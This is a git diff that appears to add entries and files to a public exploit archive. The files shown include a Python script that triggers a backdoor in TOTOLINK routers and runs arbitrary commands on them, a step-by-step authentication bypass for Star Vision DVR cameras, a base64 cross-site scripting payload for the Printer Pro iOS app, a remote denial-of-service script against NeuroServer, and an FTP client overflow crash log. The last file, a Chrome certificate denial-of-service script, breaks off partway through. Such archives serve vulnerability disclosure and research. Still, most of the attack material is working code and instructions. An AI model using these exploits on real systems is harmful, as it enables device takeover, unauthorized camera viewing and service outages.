diff --git a/files.csv b/files.csv
index bf11b86d1..af88dc136 100755
--- a/files.csv
+++ b/files.csv
@@ -473,7 +473,7 @@ id,file,description,date,author,platform,type,port
 611,platforms/windows/dos/611.c,"chesapeake tftp server 1.0 - Directory Traversal and DoS PoC Exploit",2004-11-01,"Luigi Auriemma",windows,dos,0
 612,platforms/windows/remote/612.html,"Microsoft Internet Explorer 6 - (IFRAME Tag) Buffer Overflow Exploit",2004-11-02,Skylined,windows,remote,0
 616,platforms/windows/remote/616.c,"MiniShare <= 1.4.1 - Remote Buffer Overflow Exploit",2004-11-07,class101,windows,remote,80
-618,platforms/windows/remote/618.c,"Ability Server 2.34 FTP STOR Buffer Overflow Exploit (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21
+618,platforms/windows/remote/618.c,"Ability Server 2.34 - FTP STOR Buffer Overflow Exploit (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21
 619,platforms/windows/remote/619.c,"CCProxy Log Remote Stack Overflow Exploit",2004-11-09,Ruder,windows,remote,808
 620,platforms/linux/remote/620.c,"Qwik SMTP 0.3 - Remote Root Format String Exploit",2004-11-09,"Carlos Barros",linux,remote,25
 621,platforms/windows/remote/621.c,"CCProxy 6.2 (ping) Remote Buffer Overflow Exploit",2004-11-10,KaGra,windows,remote,23
@@ -34058,6 +34058,7 @@ id,file,description,date,author,platform,type,port
 37725,platforms/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",php,webapps,0
 37726,platforms/php/webapps/37726.txt,"PHP News Script 4.0.0 - SQL Injection",2015-08-07,"Meisam Monsef",php,webapps,80
 37727,platforms/windows/dos/37727.py,"Python IDLE 2.7.8 - Crash PoC",2015-08-07,"Hadi Zomorodi Monavar",windows,dos,0
+37728,platforms/php/webapps/37728.py,"OSSEC WUI 0.8 - Denial of Service",2015-08-07,"Milad Saber",php,webapps,0
 37729,platforms/windows/remote/37729.py,"Filezilla Client 2.2.X - SEH Buffer Overflow Exploit",2015-08-07,ly0n,windows,remote,0
 37730,platforms/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - (.m3u) SEH Buffer Overflow",2015-08-07,"Saeid Atabaki",windows,local,0
 37731,platforms/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - PUT Command Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21
@@ -34073,7 +34074,27 @@ id,file,description,date,author,platform,type,port
 37744,platforms/php/webapps/37744.txt,"WordPress Video Gallery 2.7 SQL Injection",2015-08-09,"Kacper Szurek",php,webapps,0
 37749,platforms/lin_x86/shellcode/37749.c,"Linux x86 Egg Hunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",lin_x86,shellcode,0
 37750,platforms/php/webapps/37750.txt,"WDS CMS - SQL Injection",2015-08-10,"Ismail Marzouk",php,webapps,80
+37746,platforms/windows/remote/37746.py,"Netsparker 2.3.x - Remote Code Execution",2015-08-09,"Hesam Bazvand",windows,remote,0
 37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
+37755,platforms/windows/local/37755.c,"Windows 2k3 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0
+37757,platforms/multiple/webapps/37757.py,"Geoserver < 2.7.1.1  / < 2.6.4 / < 2.5.5.1 - XXE Exploit",2015-08-12,"David Bloom",multiple,webapps,0
+37759,platforms/linux/dos/37759.py,"NeuroServer 0.7.4 - (EEG TCP/IP Transceiver) Remote DoS",2015-08-12,nitr0us,linux,dos,0
+37760,platforms/windows/local/37760.rb,"PDF Shaper 3.5 - Buffer Overflow",2015-08-12,metacom,windows,local,0
+37761,platforms/ios/webapps/37761.txt,"Printer Pro 5.4.3 IOS - Persistent Cross Site Scripting",2015-08-12,"Taurus Omar",ios,webapps,0
 37762,platforms/lin_x86/shellcode/37762.py,"Linux x86 - /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",lin_x86,shellcode,0
+37763,platforms/windows/dos/37763.txt,"NetServe FTP Client 1.0 - Local DOS (Overflow)",2015-08-12,"_ Un_N0n _",windows,dos,0
 37764,platforms/windows/dos/37764.html,"Internet Explorer CTreeNode::GetCascadedLang Use-After-Free Vulnerability (MS15-079)",2015-08-12,"Blue Frost Security GmbH",windows,dos,0
+37765,platforms/multiple/webapps/37765.txt,"Zend Framework <= 2.4.2 - XML eXternal Entity Injection (XXE) on PHP FPM",2015-08-13,"Dawid Golunski",multiple,webapps,0
+37766,platforms/multiple/dos/37766.py,"Google Chrome <= 43.0 - Certificate MIME Handling Integer Overflow",2015-08-13,"Paulos Yibelo",multiple,dos,0
+37767,platforms/multiple/webapps/37767.txt,"Joomla Event Manager 2.1.4 - Multiple Vulnerabilities",2015-08-13,"Martino Sani",multiple,webapps,0
 37768,platforms/windows/local/37768.txt,"Windows 8.1 - DCOM DCE/RPC Local NTLM Reflection Privilege Escalation (MS15-076)",2015-08-13,monoxgas,windows,local,0
+37769,platforms/php/webapps/37769.txt,"Gkplugins Picasaweb - Download File",2015-08-15,"TMT zno",php,webapps,0
+37770,platforms/hardware/webapps/37770.txt,"TOTOLINK Routers - Backdoor and RCE Exploit PoC",2015-08-15,MadMouse,hardware,webapps,0
+37771,platforms/windows/local/37771.py,"Microsoft HTML Help Compiler 4.74.8702.0 - SEH Based Overflow",2015-08-15,St0rn,windows,local,0
+37772,platforms/multiple/local/37772.js,"Firefox < 39.03 - pdf.js Same Origin Policy Exploit",2015-08-15,"In Ming Loh",multiple,local,0
+37773,platforms/php/webapps/37773.txt,"Joomla com_memorix component - SQL Injection vulnerability",2015-08-15,"BM Cloudx",php,webapps,0
+37774,platforms/php/webapps/37774.txt,"Joomla com_informations component - SQL Injection vulnerability",2015-08-15,"BM Cloudx",php,webapps,0
+37775,platforms/windows/dos/37775.py,"Ability FTP Server 2.1.4 - afsmain.exe USER Command Remote DoS",2015-08-15,St0rn,windows,dos,0
+37776,platforms/windows/dos/37776.py,"Ability FTP Server 2.1.4 - Admin Panel AUTHCODE Command Remote DoS",2015-08-15,St0rn,windows,dos,0
+37777,platforms/linux/dos/37777.txt,"Ubuntu 14.04 NetKit FTP Client - Crash/DoS PoC",2015-08-15,"TUNISIAN CYBER",linux,dos,0
+37778,platforms/hardware/webapps/37778.txt,"Security IP Camera Star Vision DVR - Authentication Bypass",2015-08-15,"Meisam Monsef",hardware,webapps,0
diff --git a/platforms/hardware/webapps/37770.txt b/platforms/hardware/webapps/37770.txt
new file mode 100755
index 000000000..545788016
--- /dev/null
+++ b/platforms/hardware/webapps/37770.txt
@@ -0,0 +1,89 @@
+# Exploit Title: TOTOLINK backdoor and RCE exploit POC
+# Google Dork: N/A
+# Date: Thu Aug 13 07:33:29 MDT 2015
+# Exploit Author: MadMouse
+# Vendor Homepage: http://www.totolink.net/
+# Software Link:
+http://www.totolink.net/include/download.asp?path=down/010100&file=TOTOLINK%20A850R-V1_1.0.1_20150725.zip
+# Version: A850R-V1 : until last firwmware
+TOTOLINK-A850R-V1.0.1-B20150707.1612.web, F1-V2 : until last firmware
+F1-V2.1.1-B20150708.1646.web, F2-V1 : until last firmware
+F2-V2.1.0-B20150320.1611.web, N150RT-V2 : until last firmware
+TOTOLINK-N150RT-V2.1.1-B20150708.1548.web, N151RT-V2 : until last firmware
+TOTOLINK-N151RT-V2.1.1-B20150708.1559.web, N300RH-V2 : until last firmware
+TOTOLINK-N300RH-V2.0.1-B20150708.1625.web, N300RH-V3 : until last firmware
+TOTOLINK-N300RH-V3.0.0-B20150331.0858.web, N300RT-V2 : until last firmware
+TOTOLINK-N300RT-V2.1.1-B20150708.1613.web
+# Tested on: A850R-V1
+# CVE : N/A
+# Credit: https://pierrekim.github.io/advisories/2015-totolink-0x02.txt
+
+
+
+#!/usr/bin/env python
+#
+------------------------------------------------------------------------------
+# THE SCOTCH-WARE LICENSE (Revision 43):
+# <aaronryool@gmail.com> wrote this file. As long as you retain this notice
+you
+# can do whatever you want with this stuff. If we meet some day, and you
+think
+# this stuff is worth it, you can buy me a shot of scotch in return
+#
+------------------------------------------------------------------------------
+import socket, sys
+
+if len(sys.argv) < 2:
+    print("Usage: %s <ip> <command string>...\x1b[0m" % sys.argv[0])
+    exit(1)
+
+commandstr = urllib.quote_plus(" ".join(sys.argv[2:]))
+
+def check_activate_backdoor():
+    try:
+        vulnerable = "hel,xasf"     # this is both the check, and the
+command to open the management interface to the internet
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.connect((sys.argv[1], 5555))
+        s.send(vulnerable)
+        ret = True if s.recv(len(vulnerable)) == vulnerable else False
+        s.close()
+    except:
+        print("\x1b[031mThis just happened: \x1b[037m%s\x1b[0m" %
+sys.exc_info()[0])
+        exit(2)
+    return ret
+
+def close_backdoor():
+    try:
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.connect((sys.argv[1], 5555))
+        s.send("oki,xasf")
+        s.close()
+    except:
+        print("\x1b[031mThis just happened: \x1b[037m%s\x1b[0m" %
+sys.exc_info()[0])
+        exit(2)
+    return
+
+if check_activate_backdoor():
+    print("\x1b[032mThis device appears to be vulnerable\nbackdoor
+activated\x1b[0m")
+    try:
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.connect((sys.argv[1], 80))
+        s.send("POST /boafrm/formSysCmd
+HTTP/1.1\r\n\r\nsysCmd=%s&apply=Apply&msg=\r\n\r\n" % commandstr)
+
+        print("\x1b[032mCommands sent\x1b[0m")
+        print("\x1b[032mResponse: \n%s\x1b[0m" % s.recv(512))
+        s.close()
+    except:
+        print("\x1b[031mThis just happened: \x1b[037m%s\x1b[0m" %
+sys.exc_info()[0])
+        exit(2)
+    close_backdoor()
+    exit(0)
+else:
+    print("\x1b[032mThis device isn't vulnerable lol\x1b[0m")
+    exit(1)
diff --git a/platforms/hardware/webapps/37778.txt b/platforms/hardware/webapps/37778.txt
new file mode 100755
index 000000000..709bf139a
--- /dev/null
+++ b/platforms/hardware/webapps/37778.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Security IP Camera Star Vision DVR Authentication Bypass
+# Date: 2015-08-13
+# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
+# Vendor Homepage: #
+# Version: All Versions
+
+Exploit :
+1 - First, open your Chrome browser
+2 - Enter the IP address or domain to see the login screen of the camera
+3 - Press the F12 key to open the browser console
+4 - Click the Console tab and enter the following code
+login_set(1,1,1,1);
+5 - Now go to page view2.html
+6 - enjoy seeing camera :)
+
+Test : http://m.2.is/
+
+Video Tutorial : http://s3.picofile.com/file/8206365584/cam.mp4.html
diff --git a/platforms/ios/webapps/37761.txt b/platforms/ios/webapps/37761.txt
new file mode 100755
index 000000000..961a42629
--- /dev/null
+++ b/platforms/ios/webapps/37761.txt
@@ -0,0 +1,97 @@
+Document Title:
+===============
+Printer Pro 5.4.3 IOS  - Cross Site Scripting 
+
+Credits & Authors:
+==================
+TaurusOmar  - @TaurusOmar_ (taurusomar13@gmail.com) [taurusomar.blogspot.com]
+
+Release Date:
+=============
+2015-08-11
+
+
+Product & Service Introduction:
+===============================
+Print attachments, documents, web pages and more right from your iPhone and iPad to any Wi-Fi or USB printer.
+Printer Pro lets you wirelessly print from the iPhone or iPad. It can print directly to many Wi-Fi printers or any
+printer attached to your Mac or PC via helper application installed on your computer.
+Once installed, Printer Pro appears in the "Open In..." list on your device. This lets you print documents from Mail,
+PDF Expert and many other applications on your iPhone or iPad that support this function.
+
+(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/printer-pro-print-documents/id393313223?mt=8)
+
+
+Abstract Advisory Information:
+==============================
+An independent Vulnerability Laboratory researcher discovered multiple vulnerabilities in the official aplication  Printer Pro 5.4.3.
+
+Vulnerability Disclosure Timeline:
+==================================
+2015-08-11:	Public Disclosure 
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Readdle
+Product: Printer Pro 5.4.3 - iOS Mobile Application
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+Low
+
+
+Technical Details & Description:
+================================
+An application-side input validation  vulnerability has been discovered in the officialPrinter Pro 5.4.3 iOS mobile application.
+The vulnerability allows a local attacker to inject own script code as payload to the application-side of the vulnerable service function or module.
+The vulnerability exists in the TextBox Name contacts in which injects the code is activated When the application is opened and the contact containing 
+the script selects to print
+Request Method(s):
+					[+] Import
+Vulnerable Module(s):
+					[+] Add Contact
+
+Vulnerable Parameter(s):
+					[+] TextBox Name
+
+Vulnerable Final(s):
+					[+] Print Contact 					
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerability can be exploited by local attackers with system user account and without .
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
+
+1. Install the ios application ( https://itunes.apple.com/us/app/printer-pro-print-documents/id393313223?mt=8)
+2. Add new Contact with script in the TexBox Name 
+2. Start the app and open the import function
+3. Select contact that contains the script
+4. Successful reproduce of the persistent vulnerability!
+
+Proof of Concept (IMAGES):
+
+1. http://i.imgur.com/yku1o1c.jpg
+2. http://i.imgur.com/Q5O3X15.jpg
+3. http://i.imgur.com/uPhL9Ow.jpg
+
+
+PoC: Cross Site Scripting
+<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg=="></object>
+
+
+Security Risk:
+==============
+The security risk of the persistent input validation vulnerability in the name value is estimated as medium. (CVSS 3.7)
diff --git a/platforms/linux/dos/37759.py b/platforms/linux/dos/37759.py
new file mode 100755
index 000000000..b04fec982
--- /dev/null
+++ b/platforms/linux/dos/37759.py
@@ -0,0 +1,136 @@
+#!/usr/bin/env python
+#
+# NeuroServer 0.7.4 Remote DoS
+#
+# Shown at DEF CON 23 (BioHacking Village)
+# Brain Waves Surfing - (In)Security in EEG (Electroencephalography) Technologies
+# Slides: http://goo.gl/44r1HH
+#
+# NeuroServer is an EEG (Electroencephalography) TCP/IP Transceiver
+# http://openeeg.sourceforge.net/doc/sw/NeuroServer/
+#
+# Neuroserver mediates between the raw EEG devices and all the various EEG 
+# applications that the user may wish to run to analyse the incoming EEG data. 
+# Data is transmitted using TCP/IP, which means that the EEG data can just as 
+# easily pass over a network (or even the internet) as stay on the same machine. 
+# Standard EDF is used for header information and for file storage. 
+# The server is designed to run on Windows and Linux.
+# 
+#------------------------------------------------------------------------------
+#
+# nsd (NeuroServer Daemon) stops if any assertion is triggered inside isValidREDF() at
+# ~/NeuroServer-0.7.4/src/openedf.c:
+# ...
+#         assert(isValidREDF(result));
+# ...
+# int isValidREDF(const struct EDFDecodedConfig *cfg)
+# {
+#         int i;
+#         if (cfg->hdr.dataRecordSeconds != 1.0) {
+#                 setLastError("The data record must be exactly 1 second, not %f.",
+#                                                                  cfg->hdr.dataRecordSeconds);
+#                 return 0;
+#         }
+#         if (cfg->hdr.dataRecordChannels < 1) {
+#                 setLastError("The data record must have at least one channel.");
+#                 return 0;
+#         }
+#         if (cfg->chan[0].sampleCount < 1) {
+#                 setLastError("Channel 0 must have at least one sample.");
+#                 return 0;
+#         }
+#         for (i = 1; i < cfg->hdr.dataRecordChannels; ++i) {
+#                 if (cfg->chan[i].sampleCount != cfg->chan[0].sampleCount) {
+#                         setLastError("Channel %d has %d samples, but channel 0 has %d.  These must be the same.", cfg->chan[i].sampleCount, cfg->chan[0].sampleCount);
+#                         return 0;
+#                 }
+#         }
+#         return 1;
+# }
+#
+
+import socket
+import time
+import sys
+
+# Malformed EDF header
+# Spec: http://www.edfplus.info/specs/edf.html
+EDF  = "0       " # Version
+EDF += "Alejandro Hernandez                                                             " # Patient Identification
+EDF += "NeuroSky MindWave                                                               " # Recording Identification
+EDF += "07.04.1520.55.28768     EDF+C                                       "             # Startdate of Recording
+EDF += "29      " # Number of Data Records
+EDF += "1       " # Duration of a Data Record in Seconds
+EDF += "1337    " # Number of Signals. This value triggers the DoS: assert(cfg->hdr.dataRecordChannels < MAXCHANNELS);
+EDF += "Electrode       EDF Annotations                                                                                                                                                                                 "      # Labels and other data per channel
+EDF += "-32768  -1      32767   1       -32768  -32768  32767   32767   " # PhysiMin PhysiMax DigiMin DigiMax
+
+if len(sys.argv) != 2:
+	print 'Usage: ' + __file__ + ' <NeuroServer IP>'
+	sys.exit(1)
+
+print r'''
+                           __,--"""""""""--,.
+                     _ -\'"                  _\ ^-,_
+                  ,-"                     _/        \_
+                 ,                    /    \          \
+               ,'                    /_    |           \
+              /           _____,--"""     /         )   \
+             /           /               /         (     |
+            |          /                /      )         |
+            |         /  NeuroServer 0.7.4 Remote DoS     \
+            (     (_/\      )                 /            \
+             \        \_          ____,===="""    /        |
+              \                /"                /""       |
+               \_          _,-" |___,-'--------'"          |
+                 "`------""   --"                 ,-'      /
+                        /                     ---"        /
+                        \___/          __,-----,___       )
+                            \     ,--'"============""""-'"
+                             "-'" |  |=================/
+                                  /___\===============/
+                                   /  |=============/"
+                                   \   \_________,-"
+                                   |   |
+                                   |   |
+'''
+
+neuroserver = (sys.argv[1], 8336)
+
+s = socket.socket()
+
+print '|- Connecting to %s on port %s\n' % neuroserver
+try:
+	s.connect(neuroserver)
+except Exception, e:
+	print '|- Can\'t connect to %s:%d' % neuroserver
+	print '|- Exception: %s' % (e)
+	sys.exit(1)
+
+print '|- Entering in EEG role. NeuroServers\' response:'
+s.send('eeg\n') # EEG role in NeuroServer
+print '----------------------------------------------'
+print s.recv(16).strip('\n')
+print '----------------------------------------------'
+
+print '|- Sending Malformed EDF header (%d bytes):' % len(EDF)
+print '----------------------------------------------'
+print EDF
+print '----------------------------------------------\n'
+s.send('setheader ' + EDF + '\n')
+
+time.sleep(4)
+
+print '|- NeuroServer should be dead now. Connecting...\n'
+try:
+	s = socket.socket()
+	s.connect(neuroserver)
+except Exception, e:
+	print '|- NeuroServer is down !'
+	print '|- Exception: %s' % (e)
+else:
+	print '|- NeuroServer is still alive :-\, try again...'
+finally:
+	s.close()
+
+sys.exit(0);
\ No newline at end of file
diff --git a/platforms/linux/dos/37777.txt b/platforms/linux/dos/37777.txt
new file mode 100755
index 000000000..faffd6144
--- /dev/null
+++ b/platforms/linux/dos/37777.txt
@@ -0,0 +1,120 @@
+###
+#[+] Author: TUNISIAN CYBER
+#[+] Exploit Title: Ubuntu 14.04 NetKit FTP Client Crash/DoS POC
+#[+] Date: 15-08-2015
+#[+] Type: Local Exploits
+#[+] Tested on: Ubuntu 14.04
+                Works with other distros (11.04:https://www.exploit-db.com/exploits/17806/)
+#[+] Twitter: @TCYB3R
+##
+
+cyb3rus@ubuntu:~$ gdp ftp
+No command 'gdp' found, but there are 17 similar ones
+gdp: command not found
+cyb3rus@ubuntu:~$ gdb ftp
+GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1
+Copyright (C) 2014 Free Software Foundation, Inc.
+License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
+This is free software: you are free to change and redistribute it.
+There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
+and "show warranty" for details.
+This GDB was configured as "x86_64-linux-gnu".
+Type "show configuration" for configuration details.
+For bug reporting instructions, please see:
+<http://www.gnu.org/software/gdb/bugs/>.
+Find the GDB manual and other documentation resources online at:
+<http://www.gnu.org/software/gdb/documentation/>.
+For help, type "help".
+Type "apropos word" to search for commands related to "word"...
+Reading symbols from ftp...(no debugging symbols found)...done.
+(gdb) run ftp-server.demo.solarwinds.com
+Starting program: /usr/bin/ftp ftp-server.demo.solarwinds.com
+Connected to ftp-server.demo.solarwinds.com.
+220 Serv-U FTP Server v15.1 ready...
+Name (ftp-server.demo.solarwinds.com:cyb3rus): demo
+331 User name okay, need password.
+Password:
+230 User logged in, proceed.
+Remote system type is UNIX.
+Using binary mode to transfer files.
+ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+*** buffer overflow detected ***: /usr/bin/ftp terminated
+======= Backtrace: =========
+/lib/x86_64-linux-gnu/libc.so.6(+0x7338f)[0x7ffff784238f]
+/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x5c)[0x7ffff78d9c9c]
+/lib/x86_64-linux-gnu/libc.so.6(+0x109b60)[0x7ffff78d8b60]
+/lib/x86_64-linux-gnu/libc.so.6(__strncat_chk+0x13c)[0x7ffff78d7f9c]
+/usr/bin/ftp[0x407a08]
+/usr/bin/ftp[0x402cd0]
+/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf5)[0x7ffff77f0ec5]
+/usr/bin/ftp[0x402f49]
+======= Memory map: ========
+00400000-00413000 r-xp 00000000 08:01 656161                             /usr/bin/netkit-ftp
+00612000-00613000 r--p 00012000 08:01 656161                             /usr/bin/netkit-ftp
+00613000-00615000 rw-p 00013000 08:01 656161                             /usr/bin/netkit-ftp
+00615000-00665000 rw-p 00000000 00:00 0                                  [heap]
+7ffff5e4e000-7ffff5e64000 r-xp 00000000 08:01 5771565                    /lib/x86_64-linux-gnu/libgcc_s.so.1
+7ffff5e64000-7ffff6063000 ---p 00016000 08:01 5771565                    /lib/x86_64-linux-gnu/libgcc_s.so.1
+7ffff6063000-7ffff6064000 rw-p 00015000 08:01 5771565                    /lib/x86_64-linux-gnu/libgcc_s.so.1
+7ffff6064000-7ffff6746000 r--p 00000000 08:01 662545                     /usr/lib/locale/locale-archive
+7ffff6746000-7ffff675d000 r-xp 00000000 08:01 5771664                    /lib/x86_64-linux-gnu/libresolv-2.19.so
+7ffff675d000-7ffff695d000 ---p 00017000 08:01 5771664                    /lib/x86_64-linux-gnu/libresolv-2.19.so
+7ffff695d000-7ffff695e000 r--p 00017000 08:01 5771664                    /lib/x86_64-linux-gnu/libresolv-2.19.so
+7ffff695e000-7ffff695f000 rw-p 00018000 08:01 5771664                    /lib/x86_64-linux-gnu/libresolv-2.19.so
+7ffff695f000-7ffff6961000 rw-p 00000000 00:00 0 
+7ffff6961000-7ffff6966000 r-xp 00000000 08:01 5771611                    /lib/x86_64-linux-gnu/libnss_dns-2.19.so
+7ffff6966000-7ffff6b65000 ---p 00005000 08:01 5771611                    /lib/x86_64-linux-gnu/libnss_dns-2.19.so
+7ffff6b65000-7ffff6b66000 r--p 00004000 08:01 5771611                    /lib/x86_64-linux-gnu/libnss_dns-2.19.so
+7ffff6b66000-7ffff6b67000 rw-p 00005000 08:01 5771611                    /lib/x86_64-linux-gnu/libnss_dns-2.19.so
+7ffff6b67000-7ffff6b69000 r-xp 00000000 08:01 5771619                    /lib/x86_64-linux-gnu/libnss_mdns4_minimal.so.2
+7ffff6b69000-7ffff6d68000 ---p 00002000 08:01 5771619                    /lib/x86_64-linux-gnu/libnss_mdns4_minimal.so.2
+7ffff6d68000-7ffff6d69000 r--p 00001000 08:01 5771619                    /lib/x86_64-linux-gnu/libnss_mdns4_minimal.so.2
+7ffff6d69000-7ffff6d6a000 rw-p 00002000 08:01 5771619                    /lib/x86_64-linux-gnu/libnss_mdns4_minimal.so.2
+7ffff6d6a000-7ffff6d75000 r-xp 00000000 08:01 5771623                    /lib/x86_64-linux-gnu/libnss_nis-2.19.so
+7ffff6d75000-7ffff6f74000 ---p 0000b000 08:01 5771623                    /lib/x86_64-linux-gnu/libnss_nis-2.19.so
+7ffff6f74000-7ffff6f75000 r--p 0000a000 08:01 5771623                    /lib/x86_64-linux-gnu/libnss_nis-2.19.so
+7ffff6f75000-7ffff6f76000 rw-p 0000b000 08:01 5771623                    /lib/x86_64-linux-gnu/libnss_nis-2.19.so
+7ffff6f76000-7ffff6f8d000 r-xp 00000000 08:01 5771607                    /lib/x86_64-linux-gnu/libnsl-2.19.so
+7ffff6f8d000-7ffff718c000 ---p 00017000 08:01 5771607                    /lib/x86_64-linux-gnu/libnsl-2.19.so
+7ffff718c000-7ffff718d000 r--p 00016000 08:01 5771607                    /lib/x86_64-linux-gnu/libnsl-2.19.so
+7ffff718d000-7ffff718e000 rw-p 00017000 08:01 5771607                    /lib/x86_64-linux-gnu/libnsl-2.19.so
+7ffff718e000-7ffff7190000 rw-p 00000000 00:00 0 
+7ffff7190000-7ffff7199000 r-xp 00000000 08:01 5771609                    /lib/x86_64-linux-gnu/libnss_compat-2.19.so
+7ffff7199000-7ffff7398000 ---p 00009000 08:01 5771609                    /lib/x86_64-linux-gnu/libnss_compat-2.19.so
+7ffff7398000-7ffff7399000 r--p 00008000 08:01 5771609                    /lib/x86_64-linux-gnu/libnss_compat-2.19.so
+7ffff7399000-7ffff739a000 rw-p 00009000 08:01 5771609                    /lib/x86_64-linux-gnu/libnss_compat-2.19.so
+7ffff739a000-7ffff73a5000 r-xp 00000000 08:01 5771613                    /lib/x86_64-linux-gnu/libnss_files-2.19.so
+7ffff73a5000-7ffff75a4000 ---p 0000b000 08:01 5771613                    /lib/x86_64-linux-gnu/libnss_files-2.19.so
+7ffff75a4000-7ffff75a5000 r--p 0000a000 08:01 5771613                    /lib/x86_64-linux-gnu/libnss_files-2.19.so
+7ffff75a5000-7ffff75a6000 rw-p 0000b000 08:01 5771613                    /lib/x86_64-linux-gnu/libnss_files-2.19.so
+7ffff75a6000-7ffff75cb000 r-xp 00000000 08:01 5771684                    /lib/x86_64-linux-gnu/libtinfo.so.5.9
+7ffff75cb000-7ffff77ca000 ---p 00025000 08:01 5771684                    /lib/x86_64-linux-gnu/libtinfo.so.5.9
+7ffff77ca000-7ffff77ce000 r--p 00024000 08:01 5771684                    /lib/x86_64-linux-gnu/libtinfo.so.5.9
+7ffff77ce000-7ffff77cf000 rw-p 00028000 08:01 5771684                    /lib/x86_64-linux-gnu/libtinfo.so.5.9
+7ffff77cf000-7ffff798a000 r-xp 00000000 08:01 5771538                    /lib/x86_64-linux-gnu/libc-2.19.so
+7ffff798a000-7ffff7b89000 ---p 001bb000 08:01 5771538                    /lib/x86_64-linux-gnu/libc-2.19.so
+7ffff7b89000-7ffff7b8d000 r--p 001ba000 08:01 5771538                    /lib/x86_64-linux-gnu/libc-2.19.so
+7ffff7b8d000-7ffff7b8f000 rw-p 001be000 08:01 5771538                    /lib/x86_64-linux-gnu/libc-2.19.so
+7ffff7b8f000-7ffff7b94000 rw-p 00000000 00:00 0 
+7ffff7b94000-7ffff7bd1000 r-xp 00000000 08:01 5771663                    /lib/x86_64-linux-gnu/libreadline.so.6.3
+7ffff7bd1000-7ffff7dd1000 ---p 0003d000 08:01 5771663                    /lib/x86_64-linux-gnu/libreadline.so.6.3
+7ffff7dd1000-7ffff7dd3000 r--p 0003d000 08:01 5771663                    /lib/x86_64-linux-gnu/libreadline.so.6.3
+7ffff7dd3000-7ffff7dd9000 rw-p 0003f000 08:01 5771663                    /lib/x86_64-linux-gnu/libreadline.so.6.3
+7ffff7dd9000-7ffff7dda000 rw-p 00000000 00:00 0 
+7ffff7dda000-7ffff7dfd000 r-xp 00000000 08:01 5771514                    /lib/x86_64-linux-gnu/ld-2.19.so
+7ffff7fdf000-7ffff7fe2000 rw-p 00000000 00:00 0 
+7ffff7fea000-7ffff7feb000 rw-p 00000000 00:00 0 
+7ffff7feb000-7ffff7ff2000 r--s 00000000 08:01 920152                     /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache
+7ffff7ff2000-7ffff7ff8000 rw-p 00000000 00:00 0 
+7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0                          [vvar]
+7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0                          [vdso]
+7ffff7ffc000-7ffff7ffd000 r--p 00022000 08:01 5771514                    /lib/x86_64-linux-gnu/ld-2.19.so
+7ffff7ffd000-7ffff7ffe000 rw-p 00023000 08:01 5771514                    /lib/x86_64-linux-gnu/ld-2.19.so
+7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0 
+7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0                          [stack]
+ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
+
+Program received signal SIGABRT, Aborted.
+0x00007ffff7805cc9 in __GI_raise (sig=sig@entry=6)
+    at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
+56	../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
\ No newline at end of file
diff --git a/platforms/multiple/dos/37766.py b/platforms/multiple/dos/37766.py
new file mode 100755
index 000000000..8448dbc01
--- /dev/null
+++ b/platforms/multiple/dos/37766.py
@@ -0,0 +1,49 @@
+#! /usr/bin/python2
+
+import socket
+import sys
+import time
+
+kHost = '127.0.0.1'
+kPort = 443
+
+def bind_listen():
+  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+  s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+  s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
+  s.bind((kHost, kPort))
+  s.listen(1)
+  return s
+
+def send_certificate(c, r):
+  print '[*] sending certificate'
+  payload = ''
+  with open('compressed', 'rb') as tmp:
